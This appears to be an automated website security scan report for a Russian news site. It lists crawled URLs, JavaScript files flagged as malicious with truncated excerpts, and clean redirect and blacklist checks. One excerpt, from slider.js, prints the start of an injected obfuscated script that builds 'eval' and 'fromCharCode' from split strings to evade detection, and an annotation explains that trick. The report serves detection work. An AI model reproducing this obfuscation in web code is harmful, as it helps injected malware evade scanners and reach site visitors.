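Scanned pages/files
The code quoted under each "malicious" row is only the beginning of the file and is cut off mid-statement. Several excerpts open with the `eval(function(p,a,c,k,e,r){...})` packer wrapper, which legitimately packed libraries also use, so the wrapper by itself does not show what was detected; the flagged code may lie beyond the quoted part.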
Request | Server response | Status |
http://www.vestnik26.ru/ | 200 OK Content-Length: 49112 Content-Type: text/html | clean |
http://www.vestnik26.ru/templates/00069/js/jquery.js | 200 OK Content-Length: 37255 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b) Antivirus reports:
| ||
http://www.vestnik26.ru/templates/00069/js/slider.js | 200 OK Content-Length: 6506 Content-Type: application/javascript | malicious |
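Malicious code - confirmed by antiviruses (see below). Excerpt, cut off by the scanner:
$(document).ready(function () {
$('img.menu_class1').click(function () { $('div.the_menu1').slideToggle('medium'); }); }); $(document).ready(function () { $('img.menu_class2').click(function () { $('div.the_menu2').slideToggle('medium'); }); }); d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["subst
The two `slideToggle` click handlers are ordinary menu code. The code appended after them, from `d=Date;` onward, is the part that looks injected: it builds the fragment `val` (`'zv'.substr(1)` plus `'al'`) and what appears to be `fromCharCode` out of split strings, presumably so that `eval` and `String.fromCharCode` never appear literally in the file. The rest of the payload is not shown in this excerpt.
Antivirus reports: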
| ||
http://www.vestnik26.ru/engine/ajax/menu.js | 200 OK Content-Length: 9566 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var menuwidth='165px';var disappeardelay=1000;var hidemenu_onclick="yes";var ie4=document.all;var ns6=document.getElementById&&!document.all;if(ie4||ns6)document.write('<div id="dropmenudiv" style="visibility:hidden;position:absolute;z-index:100;width:'+menuwidth+';" onMouseover="clearhidemenu()" onMouseout="dynamichide(event)"></div>');function getposOffset(what,offsettype){var totaloffset=(offsettype=="left")?what.offsetLeft:what.offsetTop;var parentEl=what.offsetParent;whi Antivirus reports:
| ||
http://www.vestnik26.ru/engine/ajax/dle_ajax.js | 200 OK Content-Length: 11331 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a 2D(){7 z=9.I("1F");6(z!=C){z.h.1G="2E";z.h.O=1H().18+\'1i\'}};a 1H(){7 d=9,w=m,P=d.1I&&d.1I!=\'2F\'?d.s:d.t;7 b=d.t;7 1J=(w.Q&&m.1K)?w.Q+w.1K:1j.1k(b. Antivirus reports:
| ||
http://www.vestnik26.ru/engine/ajax/js_edit.js | 200 OK Content-Length: 13377 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5 L=l O();5 T=l O();5 1u;5 1v;5 1w;5 1x;7 2X(1a,1S,1T,1U){5 d=l O();d[0]=\'<a s="2Y://2Z.30.31/32/?1y=\'+1a+\'" 1b="1c">\'+1S+\'</a>\';d[1]=\'<a s="\'+e+ Antivirus reports:
| ||
http://www.vestnik26.ru/engine/classes/highslide/highslide.js | 200 OK Content-Length: 42150 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('u m={S:{7J:\'8c\',92:\'ar...\',87:\'7p 1K aj\',ag:\'7p 1K an 1K al\',7Y:\'aq 1K aX H (f)\',9K:\'aZ by <i>9e 8b</i>\',9H:\'b0 1K aW 9e 8b aS\',7l:\ Antivirus reports:
| ||
http://js.smi2.ru/data/js/30522.js | 200 OK Content-Length: 3973 Content-Type: application/javascript | clean |
http://www.vestnik26.ru/index.php?do=feedback | 200 OK Content-Length: 36594 Content-Type: text/html | clean |
http://www.vestnik26.ru/sitemap.xml | 200 OK Content-Length: 4280 Content-Type: application/xml | clean |
http://www.vestnik26.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.vestnik26.ru/engine/rss.php | 200 OK Content-Length: 34893 Content-Type: application/xml | clean |
http://www.vestnik26.ru/news/our_news/politics/ | 200 OK Content-Length: 36037 Content-Type: text/html | clean |
http://www.vestnik26.ru/news/our_news/economy/ | 404 Not Found Content-Length: 34278 Content-Type: text/html | clean |
http://www.vestnik26.ru/news/our_news/agriculture/ | 200 OK Content-Length: 35857 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vestnik26.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vestnik26.ru
Referer: http://www.google.com/search?q=vestnik26.ru
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vestnik26.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vestnik26.ru/
Result: vestnik26.ru is not infected or malware details are not published yet.